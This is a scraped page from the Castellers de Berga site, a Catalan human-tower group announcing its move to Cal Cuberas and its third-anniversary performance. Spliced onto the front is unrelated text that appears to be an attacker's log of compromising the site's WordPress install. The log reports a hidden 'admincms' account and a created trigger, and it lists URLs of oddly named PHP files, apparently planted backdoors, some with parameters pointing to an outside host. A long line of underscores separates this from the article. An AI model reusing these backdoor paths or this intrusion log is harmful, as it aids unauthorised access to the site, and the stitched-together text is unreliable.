Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?wp https://castellersdeberga.cat/wp-admin/my-sites-cron-wp-ajax-response-ajax-ajax-response.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-bulk-plugin-upgrader-skin-stream-wp-wp-ajax-response-core-private-ajax.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-ssh2-private-core-cron-ajax-response-stream-cron.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/woocommerce-redsys-ajax-meta-private-ajax-response-ajax-response-meta-core-core-ajax-response-stream.php https://castellersdeberga.cat/wp-content/plugins/revslider/revslider-stream-meta-ajax-response-cron-meta-ajax-response-wp-wp-stream-cron-stream.php https://castellersdeberga.cat/wp-includes/class-wp-tax-query-wp-ajax-meta.php https://castellersdeberga.cat/wp-includes/pomo/streams-private-ajax-response.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Ens mudem i 3r aniversari
 

Ens mudem i 3r aniversari


Ens mudem i 3r aniversariEls Castellers de Berga vam començar la nostra història al gimnàs de l’Institut Guillem de Berguedà, el gener de 2012. De seguida, des del segon dia, va quedar petit i vam començar els assajos al gimnàs de l’Escola Santa Eulàlia. A aquesta escola pública de Berga hi vam estar del febrer de 2012 a l’1 de maig de 2013. Des del maig de 2013 tenim el nostre local d’assaig al Teatre de Cal Rosal. L’espai compleix les condicions que necessita una colla castellera per assajar però és a 3 o 4 km del centre de Berga i haver-hi d’arribar en cotxe és un fre per a la progressió de la colla. A Cal Rosal hi hem estat més de dos anys i ens hi hem sentim molt ben tractats i acollits. Tenim altres aspectes a millorar com a colla però disposar d’un local al centre urbà era una necessitat des de feia mesos.

Ens mudem a Cal Cuberas, a la Ronda Moreta, 12edifici protegit com a bé cultural d’interès local. Celebrem el 3r aniversari de la colla amb un local al centre de Berga. Moltes gràcies a la bona gent de Cal Rosal, ens hi hem sentit com a casa. Ara comencem una altra etapa amb nous reptes i nous somnis.

Amb aquesta mudança encarem la setmana que culminarà amb la celebració del nostre 3r aniversari. A l’actuació de la Plaça Viladomat, ens hi acompanyen els nostres padrins Castellers de Sabadell i els Salats de Súria, colla amb qui tenim una molt bona relació i que ens ha ajudat molt en els nostres primers anys. Els castells començaran a 2/4 de 7 de la tarda. Després de l’actuació castellera, les tres colles soparem a la mateixa Plaça Viladomat i gaudirem d’un espectacle d’humor. La música començarà tot seguit amb Panxocontents, The Papa’s & the Popo’s i PD Urrixic.

https://www.facebook.com/events/391689181027758/